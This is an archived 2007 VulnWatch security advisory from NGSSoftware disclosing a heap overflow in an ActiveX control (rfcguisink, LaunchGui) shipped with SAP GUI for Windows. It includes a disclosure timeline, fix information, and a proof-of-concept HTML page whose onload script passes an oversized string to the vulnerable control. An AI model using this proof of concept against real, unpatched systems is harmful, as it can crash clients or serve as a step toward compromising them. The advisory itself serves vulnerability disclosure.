Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [VulnWatch] EnjoySAP, SAP GUI for Windows - Heap Overflow |
|---|---|
| Date: | Thu, 05 Jul 2007 16:00:59 +0100 |
======= Summary ======= Name: EnjoySAP, SAP GUI for Windows - Heap Overflow Release Date: 5 July 2007 Reference: NGS00482 Discover: Mark Litchfield <mark@ngssoftware.com> Vendor: SAP Vendor Reference: SECRES-290 Systems Affected: All ASCII Versions Risk: High Status: Fixed ======== TimeLine ======== Discovered: 4 January 2007 Released: 19 January 2007 Approved: 29 January 2007 Reported: 12 January 2007 Fixed: 27 March 2007 Published: =========== Description =========== EnjoySAP, also know as Enjoy is the most popular SAP GUI used today. The latest version can be obtained from ftp://ftp.sap.com/pub/sapgui/win/ When installing EnjoySAP, in appreciation of its vast size for being a client (around 500MB), there are an astounding 1102 ActiveX controls installed. A relatively brief examinaton of these controls, found a large number of instances that would terminate EnjoySAP process, there were a number that could create files on the file system (there unfortunately exists no ability to inject content into these created files) and a number of bufferoverruns. ================= Technical Details ================= Control - rfcguisink.rfcguisink.1 Function - LaunchGui POC: <HTML> <HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1252"> <SCRIPT type=text/javascript> function init() { var foo = ""; for(var icount = 0; icount < 1800; icount++) { foo = foo + "x"; } var ngssoftware; ngssoftware = new ActiveXObject("rfcguisink.rfcguisink.1"); ngssoftware["LaunchGui"](foo, 1, 1); } //--> </SCRIPT> </HEAD> <BODY bgColor=#ffffff onload=init()> </BODY></HTML> =============== Fix Information =============== Please ensure you are running the latest version NGSSoftware Insight Security Research http://www.ngssoftware.com/ http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Multiple Remote unauthenticated stack overflows in Asterisk chan_sip.c, NGSSoftware Insight Security Research |
|---|---|
| Next by Date: | EnjoySAP, SAP GUI for Windows - Stack Overflow, NGSSoftware Insight Security Research |
| Previous by Thread: | Multiple Remote unauthenticated stack overflows in Asterisk chan_sip.c, NGSSoftware Insight Security Research |
| Next by Thread: | EnjoySAP, SAP GUI for Windows - Stack Overflow, NGSSoftware Insight Security Research |
| Indexes: | [Date] [Thread] [Top] [All Lists] |